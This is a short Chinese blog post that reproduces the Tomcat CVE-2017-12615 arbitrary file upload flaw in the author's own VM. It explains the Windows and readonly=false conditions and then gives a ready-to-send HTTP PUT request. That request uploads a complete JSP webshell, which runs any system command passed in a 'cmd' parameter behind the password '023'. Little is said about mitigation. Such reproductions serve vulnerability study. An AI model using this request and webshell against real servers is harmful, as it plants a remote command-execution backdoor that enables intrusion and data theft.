CVE-2017-12615漏洞利用

Tomcat任意文件上传漏洞CVE-2017-12615复现

今天在群里听到有人讲这个CVE-2017-12615漏洞,想起自己的虚机ubuntu里面曾经装过tomcat,午休时间来瞅瞅。

 

漏洞利用条件和方式

CVE-2017-12615漏洞利用需要在Windows环境,且需要将 readonly 初始化参数由默认值设置为 false,经过实际测试,Tomcat 7.x版本内web.xml配置文件内默认配置无readonly参数,需要手工添加,默认配置条件下不受此漏洞影响。

 

 

漏洞描述:

  当 Tomcat运行在Windows操作系统时,且启用了HTTP PUT请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求数据包向服务器上传包含任意代码的 JSP 文件,JSP文件中的恶意代码将能被服务器执行。导致服务器上的数据泄露或获取服务器权限。

 

 

漏洞复现

 首先运行tomcat环境,startup.sh

 

修改conf/web.xml文件添加readonly参数,属性值为false

 

使用burpsuite发送构造的的webshell

 

    PUT /123.jsp/ HTTP/1.1  
    Host: 192.168.23.209:8080  
    User-Agent:  JNTASS  
    DNT:1  
    Connection: close  
    Content-Length: 664  
      
    <%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp  
    +"\\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%><%if("023".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");}else{out.println(":-)");}%>  

 

 

 

漏洞利用就这样简单的完成。

 

 

 

任重而道远!

 

posted on 2017-12-20 14:28  Oran9e  阅读(2752)  评论(0编辑  收藏  举报